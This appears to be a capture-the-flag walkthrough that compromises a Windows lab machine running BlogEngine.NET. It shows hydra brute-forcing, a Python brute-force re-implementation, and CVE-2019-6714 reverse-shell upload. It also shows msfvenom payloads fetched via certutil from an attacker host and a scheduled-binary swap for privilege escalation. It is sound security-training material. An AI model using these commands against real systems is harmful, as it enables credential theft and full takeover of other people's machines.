[Task 1] Deploy the vulnerable Windows machine
- Deploy the machine and access its web server.
nmap -Pn <ip>
High port scan
nmap -p1000- -Pn <ip>
Service and OS scan
nmap -A -p 80,3389 <ip>
nmap -p 80,3389 --script vuln <ip>
The host does not answer ICMP, so nmap needs -Pn (skip host discovery) before it will scan ports at all; that points to a host firewall dropping ping probes.
There are 2 services:
Port 80: Microsoft IIS (web server, probably)
Port 3389: Microsoft Remote Desktop (RDP, probably)
3389 is the standard RDP port, so this is almost certainly a Windows machine.
2. What's the name of the clown displayed on the homepage?
Access the HTTP site in a browser.
[Task 2] Using Hydra to brute-force a login
- What request type is the Windows website login form using?
Let's explore the site.
Try SQL injection in the search form:
1' or 1=1--+
SQL injection doesn't work.
XSS doesn't work either.
Archive section: not useful.
Try SQL injection in the login form as well: the form doesn't react to the payload.
Login section: the site runs "blogengine.net".
The default credential is admin:admin.
Let's try it. Failed!
Let’s find other directory with gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,aspx
I followed many of the discovered links, but they lead to the same sections as before.
robots.txt: nothing useful either.
With nothing else left to try, I fall back to brute-forcing the login with hydra.
Create user list first
echo admin > users.txt
echo pennywise >> users.txt
cat users.txt
Intercept the login request with Burp Suite.
It's a POST request.
2. Guess a username, choose a password wordlist and gain credentials to a user account!
Craft the hydra command: copy the full POST body from Burp (the real form carries more fields than just username and password), replace the username value with ^USER^ and the password value with ^PASS^, and give hydra the text that appears on a failed login as the F= failure marker. Verify that marker with one deliberately wrong login first: if the marker never appears, every attempt is reported as a hit.
hydra command (-u loops over users for each password, -V prints every attempt, -F stops at the first valid pair):
hydra -L <username list> -P <password list> <ip> http-post-form "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -u -V -F
The credential is admin:1qaz2wsx .
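To make the hydra flags concrete, here is an added example (my code, not part of the original writeup and not hydra's source) that re-implements the http-post-form logic in Python and runs it against a constructed local login stub, so it works offline. The stub, its /login path, the username/password field names, the "incorrect" failure text and the mini wordlist are all constructed for the demo; the only value taken from the writeup is the admin:1qaz2wsx pair.

```python
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stub "server side" for the demo: the one pair it accepts.
VALID_CREDS = {"admin": "1qaz2wsx"}


class LoginStub(BaseHTTPRequestHandler):
    """Stand-in for the blog's login form (constructed, not BlogEngine itself)."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        ok = VALID_CREDS.get(user) == password
        # Real apps often answer 200 for both outcomes; the body text is what
        # tells success from failure, which is why hydra needs the F= marker.
        body = b"Welcome to the dashboard" if ok else b"Login incorrect"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the stub silent
        pass


def start_stub():
    """Bind the stub to an ephemeral loopback port and serve it in a thread."""
    srv = HTTPServer(("127.0.0.1", 0), LoginStub)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def http_post_form(url, template, users, passwords, fail_marker,
                   loop_users=True, stop_on_first=True):
    """Re-implementation of hydra's http-post-form module.

    template      -> the body part of hydra's "<path>:<body>:F=<marker>" argument,
                     with ^USER^ / ^PASS^ substituted per attempt.
    fail_marker   -> hydra's F=: a response that does NOT contain it counts as a hit.
    loop_users    -> hydra -u: for each password try every user (spreads attempts
                     across accounts, which helps against per-account lockout).
    stop_on_first -> hydra -F: stop at the first valid pair.
    Returns (found_pairs, attempts_made).
    """
    if loop_users:
        pairs = [(u, p) for p in passwords for u in users]
    else:
        pairs = [(u, p) for u in users for p in passwords]
    found, attempts = [], 0
    for user, password in pairs:
        body = (template.replace("^USER^", urllib.parse.quote(user))
                        .replace("^PASS^", urllib.parse.quote(password)))
        req = urllib.request.Request(
            url, data=body.encode(), method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        with urllib.request.urlopen(req, timeout=5) as resp:
            page = resp.read().decode(errors="replace")
        attempts += 1
        if fail_marker not in page:
            found.append((user, password))
            if stop_on_first:
                break
    return found, attempts


def demo(fail_marker="incorrect"):
    """Run the attack against the local stub with a constructed mini wordlist."""
    srv, port = start_stub()
    try:
        users = ["admin", "pennywise"]                              # users.txt from above
        passwords = ["password", "123456", "1qaz2wsx", "letmein"]  # constructed list
        return http_post_form(f"http://127.0.0.1:{port}/login",
                              "username=^USER^&password=^PASS^",
                              users, passwords, fail_marker)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())                # ([('admin', '1qaz2wsx')], 5)
    print(demo("no such text"))  # wrong F= marker: first attempt is a false hit
```

The second call shows the caveat that matters in practice: a failure marker that never occurs in the response makes the very first guess look valid, which is why the marker has to be checked against a known-bad login before the wordlist is run. The -u ordering is visible in the attempt count: both users are tried for each password, so admin:1qaz2wsx is hit on the fifth request.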
[Task 3] Compromise the machine
- Now you have logged into the website, are you able to identify the version of the BlogEngine?
The About section of the admin dashboard lists the installed BlogEngine version (the number survived in this copy of the writeup only as the garbled string 126.96.36.199; read it off the About page).
2. Use the exploit database archive to find an exploit to gain a reverse shell on this system. What is the CVE?
I can use searchsploit instead of searching the Exploit-DB site. Exploit-DB entry 46353 is the BlogEngine.NET 3.3.6 directory traversal / remote code execution exploit (CVE-2019-6714). Copy it into the working directory:
searchsploit -m 46353
Review the script before using it: it is an .ascx file that, once it is uploaded through the blog's file manager and loaded by the application, connects back to the IP address and port hard-coded in it.
3. Using the public exploit, gain initial access to the server.
Who is the webserver running as?
Edit the IP address and port number in the script to point at your listener.
Save it as PostView.ascx (the file name matters: the exploit relies on BlogEngine loading a theme control by that name).
Back to dashboard, click at Content -> Posts -> New
Click directory icon
Upload the script.
Start a listener on the port set in the script:
nc -lvp 1234
Trigger the uploaded script by browsing to the URL given in the exploit's own instructions (it uses the traversal in the theme parameter, /?theme=../../App_Data/files).
Now I have a shell.
[Task 4] Windows Privilege Escalation
- Our netcat session is a little unstable, so let's generate another reverse shell using msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Create an HTTP server to host the file (Python 2; on Python 3 use python3 -m http.server 80):
python -m SimpleHTTPServer 80
Back on the victim's machine, download the file:
cd \Windows\Temp
certutil -urlcache -f http://<ip>/shell.exe shell.exe
dir
I also download winPEAS.exe in case I need it later.
certutil -urlcache -f http://<ip>/winPEAS.exe winPEAS.exe
Back on the attacker's machine, set up the Metasploit handler. The LHOST and LPORT must match the values baked into shell.exe; multi/handler has no RHOST option, it only listens.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <Local IP>
set LPORT <Local Port>
run
Back on the victim's machine, run shell.exe.
Back on the attacker's machine, the handler now has a Meterpreter session.
2. What is the OS version of this windows machine?
2. What is the name of the abnormal service running?
Try to escalate privileges with Meterpreter's built-in methods.
That doesn't work here.
I'll try the local exploit modules instead:
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
run
I tried other local exploit modules as well, but every one of them failed, so I have to find another way.
2. What is the name of the binary you’re supposed to exploit?
I need to run winPEAS.
The .exe throws errors in this shell, so I fall back to the simpler batch version, winPEAS.bat:
certutil -urlcache -f http://10.11.11.30/winPEAS.bat winPEAS.bat
3. Using this abnormal service, escalate your privileges! What is the user flag (on Jeffs Desktop)?
cd "\Program Files (x86)\SystemScheduler"
dir
Read the log file.
The log shows the scheduler running Message.exe as Administrator.
Copy Message.exe as a backup in case I screw up:
cd ..
copy Message.exe Message_bak.exe
I need to replace Message.exe with a malicious binary of the same name. Before doing so, check that the current user can actually write to the file (icacls Message.exe); if the ACL does not grant write access, the overwrite will fail.
Back on the attacker's machine, create another shell binary, this time a plain reverse shell on a new port:
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=1236 -f exe > Message.exe
nc -lvp 1236
Back on the victim, overwrite Message.exe with the download:
certutil -urlcache -f http://10.11.11.30/Message.exe Message.exe
Back on the attacker's machine, wait at the port 1236 listener for the scheduler to run Message.exe again; the shell that comes back runs as the scheduler's user.
whoami cannot be run in this shell.
Use an alternative, for example echo %USERNAME%.
cd \Users\jeff\Desktop
dir
type user.txt
4. What is the root flag?
cd \Users\Administrator\Desktop
type root.txt